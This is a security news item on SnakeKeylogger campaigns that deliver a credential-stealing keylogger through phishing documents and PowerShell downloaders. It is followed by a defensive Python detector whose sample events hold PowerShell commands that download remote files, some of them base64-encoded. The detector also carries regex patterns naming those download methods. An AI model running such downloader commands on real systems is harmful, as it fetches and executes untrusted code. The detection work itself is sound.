Intrusions that use the SnakeKeylogger malware, also known as KrakenKeylogger, to exfiltrate credentials and screenshots from Windows systems have been escalating, reports The Register.
Zero-day detection hits for SnakeKeylogger reached hundreds, with the trojan attempting communications with numerous outside servers, according to an alert from Fortinet's FortiGuard Labs. The alert gave no information on the attack vector used to deliver SnakeKeylogger, but the malware has previously been distributed through phishing campaigns, and a separate Check Point advisory notes that the payload's code is concealed within malicious Office document or PDF attachments. "The malware embedded in the document is typically a downloader. It uses PowerShell scripts to download a copy of Snake Keylogger to the infected system and execute it," said Check Point. Organizations have been urged to be more vigilant about emails and their accompanying links and attachments, and to ensure the adoption of updated security systems, including antivirus and endpoint security tools.
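The delivery chain Check Point describes (a document attachment that launches a PowerShell downloader) can be looked for in process-creation telemetry. The following Python is an added example, not code from Fortinet, Check Point or The Register; the event field names, process lists and indicator patterns are assumptions, and the sample events are constructed.

```python
import base64
import re

# Assumed names: document readers that open attachments, and PowerShell hosts.
DOC_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe", "acrobat.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumed download indicators; extend for your environment.
DOWNLOAD_RE = re.compile(
    r"net\.webclient|download(?:file|string|data)|invoke-webrequest|\biwr\b|start-bitstransfer",
    re.I)
# -EncodedCommand and its accepted abbreviations (-e, -ec, -en, -enc, ...).
ENC_RE = re.compile(r"\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def expand(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE), if any."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 or bad UTF-16: keep the raw command line
        return cmdline

def is_doc_downloader(ev):
    """True when a document reader spawned PowerShell that fetches remote content."""
    return (basename(ev["parent"]) in DOC_PARENTS
            and basename(ev["image"]) in SHELLS
            and bool(DOWNLOAD_RE.search(expand(ev["cmd"]))))

def enc(script):
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed process-creation events (not taken from any real incident).
P = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"parent": r"C:\Office\WINWORD.EXE", "image": P,
     "cmd": "powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','a')"},
    {"parent": r"C:\Office\EXCEL.EXE", "image": P,
     "cmd": "powershell -nop -enc " + enc("Invoke-WebRequest http://example.invalid/a -OutFile a")},
    {"parent": r"C:\Windows\explorer.exe", "image": P,
     "cmd": "powershell Invoke-WebRequest http://example.invalid/a"},
    {"parent": r"C:\Office\WINWORD.EXE", "image": P, "cmd": "powershell Get-Date"},
]

def flagged(events=EVENTS):
    return [i for i, ev in enumerate(events) if is_doc_downloader(ev)]
```

Calling `flagged()` returns the indices of the two document-spawned downloader events; the PowerShell launched from Explorer and the harmless `Get-Date` call are left alone.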